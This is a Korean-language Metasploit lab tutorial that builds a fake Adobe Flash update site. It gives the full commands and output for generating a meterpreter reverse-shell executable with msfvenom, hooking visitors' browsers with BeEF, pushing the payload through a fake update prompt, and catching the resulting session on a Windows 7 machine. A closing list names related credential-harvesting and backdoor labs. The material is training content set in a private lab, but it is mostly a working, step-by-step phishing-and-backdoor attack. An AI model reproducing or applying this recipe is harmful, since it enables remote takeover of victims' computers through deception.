metasploit 19. Fake Update Site 구축

[추가적인 실습]

 

■ Fake Update Site 구축

 

(KaliLinux)

 

① 클라이언트에 설치할 payload 생성

[TERM1] 첫번째 터미널

# cd /var/www/html

# msfvenom \

-p windows/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 \

-f exe \

-o payload.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Saved as: payload.exe

 

# ls

index.html payload.exe

 

# file payload.exe

payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows

 

② 브라우저 후킹을 위한 beef 실행

 

(선수작업) beef-xss 실행하기 전의 선수작업

# mfsconsole

msf> load msgrpc Pass=abc123

 

# cd /usr/share/beef-xss

# ./beef -x

[17:42:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [17:42:34][*] Browser Exploitation Framework (BeEF) 0.4.6.1-alpha [17:42:34] | Twit: @beefproject [17:42:34] | Site: http://beefproject.com [17:42:34] | Blog: http://blog.beefproject.com [17:42:34] |_ Wiki: https://github.com/beefproject/beef/wiki [17:42:34][*] Project Creator: Wade Alcorn (@WadeAlcorn) [12:36:56][*] Successful connection with Metasploit. [12:36:59][*] Loaded 292 Metasploit exploits. [17:42:34][*] Resetting the database for BeEF. [17:42:35][*] BeEF is loading. Wait a few seconds... [17:42:42][*] 13 extensions enabled. [17:42:42][*] 241 modules enabled. [17:42:42][*] 3 network interfaces were detected. [17:42:42][+] running on network interface: 127.0.0.1 [17:42:42] | Hook URL: http://127.0.0.1:3000/hook.js [17:42:42] |_ UI URL: http://127.0.0.1:3000/ui/panel [17:42:42][+] running on network interface: 192.168.10.50 [17:42:42] | Hook URL: http://192.168.10.50:3000/hook.js [17:42:42] |_ UI URL: http://192.168.10.50:3000/ui/panel [17:42:42][+] running on network interface: 192.168.20.50 [17:42:42] | Hook URL: http://192.168.20.50:3000/hook.js [17:42:42] |_ UI URL: http://192.168.20.50:3000/ui/panel [17:42:42][*] RESTful API key: 70eb1ff6c875ee46f110719f26ae0c7014763fea [17:42:42][*] HTTP Proxy: http://127.0.0.1:6789 [17:42:42][*] DNS Server: 127.0.0.1:5300 (udp) [17:42:42] | Upstream Server: 8.8.8.8:53 (udp) [17:42:42] |_ Upstream Server: 8.8.8.8:53 (tcp) [17:42:42][*] BeEF server started (press control+c to stop)

-> 에러메세지는 무시한다. (현재 실습에서는 상관이 없다.)

-> [참고] 에러메세지(다음과 같은 메세지가 나오는 경우의 제어)

[17:42:34][!] API Fire Error: authentication failed in

{:owner=>BeEF::Extension::Metasploit::API::MetasploitHooks, :id=>12}.post_soft_load()

[TERM2] # mfsconsole

msf> load msgrpc Pass=abc123

[TERM1] # cd /usr/share/beef-xss ; ./beef -x

 

③ msfconsole 실행

[TERM1] 두번째 터미널

# msfconsole

msf > use exploit/multi/handler msf exploit(handler) > show options   Module options (exploit/multi/handler):   Name Current Setting Required Description ---- --------------- -------- -----------     Exploit target:   Id Name -- ---- 0 Wildcard Target     msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > show options   Module options (exploit/multi/handler):   Name Current Setting Required Description ---- --------------- -------- -----------     Payload options (windows/meterpreter/reverse_tcp):   Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port     Exploit target:   Id Name -- ---- 0 Wildcard Target   msf exploit(handler) > set LHOST 192.168.20.50 LHOST => 192.168.20.50 msf exploit(handler) > show options   Module options (exploit/multi/handler):   Name Current Setting Required Description ---- --------------- -------- -----------     Payload options (windows/meterpreter/reverse_tcp):   Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.20.50 yes The listen address LPORT 4444 yes The listen port     Exploit target:   Id Name -- ---- 0 Wildcard Target   msf exploit(handler) > exploit   [*] Started reverse handler on 192.168.20.50:4444 [*] Starting the payload handler...

 

④ Fake download site 구축

[TERM3] 세번째 터미널

# vi /var/www/html/index.html

<DOCTYPE html> <html> <head> <title>Adobe flash</title> <script src="http://192.168.20.50:3000/hook.js"></script> </head> <body><center> <img src="adobe.jpg" alt="adobe" width="204" length="204"> <p> <input type="button" name="btnDownload" value="Update" onclick="window.open('payload.exe','download') return false;"/> </p> </body> </html>

 

/var/www/html/adobe.jpg 파일을 하나 만들어 놓는다.

-> firefox 실행하고

www.google.com 검색 부분에서 "adobe flash palyer" 검색하고

적당한 이미지를 찾아

/var/www/html 디렉토리에 adobe.jpg 이름으로 다운로드 한다. (!!! 파일 이름/확장자 주의 !!!)

 

# service apache2 restart

# service apache2 status

 

⑤ beef 접속

# firefox http://192.168.20.50:3000/ui/panel &

ID/PASS: beef/beef

 

 

(windows 7)

 

⑥ 클라이언트(windows7 chrome browser)에서 192.168.20.50 접속

 

Chrome 브라우저를 사용하여 접속한다.

- http://192.168.20.50

- 그럼 브라우저 후킹이 된다.

 

 

 

 

 

(KaliLinux)

 

⑦ Fake Flash Update 실행

 

beEF 브라우저에서

 

Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202

Commands 탭 > Social Engineering > Fake Flash Update >

Fake Flash Update 입력란에

- Image: http://192.168.20.50:3000/adobe/flash_update.png

- Payload: Custom_Payload

- Custom Payload URL: http://192.168.20.50/payload.exe

- Execute 선택

 

(windows 7)

⑧ 윈도우에서 확인

 

이미지를 선택하면 자동으로 프로그램이 다운로드 된다.

 

다운로드가 완료된 payload.exe 실행한다.

 

  

(KaliLinux)

 

[TERM1] 두번째 터미널

⑨ meterpreter 실행

msf exploit(handler) > exploit   [*] Started reverse handler on 192.168.20.50:4444 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 192.168.20.202 [*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49348) at 2015-12-30 18:05:11 +0900   meterpreter > sysinfo Computer : SOLDESK-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : ko_KR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 meterpreter > getuid Server username: soldesk-PC\soldesk   meterpreter >

-> 여러가지 명령어를 수행해 본다.

 

[정리]

(실습1) Fake Site 구성

-> (목적) ID/PASS 수집(http://192.168.20.50)

(실습2) Fake Site 구성

-> (목적) 악성 프로그램 설치(백도어)(http://192.168.20.50)

(실습3) Fake Email 전송

-> (목적) 악성 프로그램 설치(백도어)

(실습4) XSS

-> (목적) 악성 프로그램 설치(백도어)(http://192.168.20.50)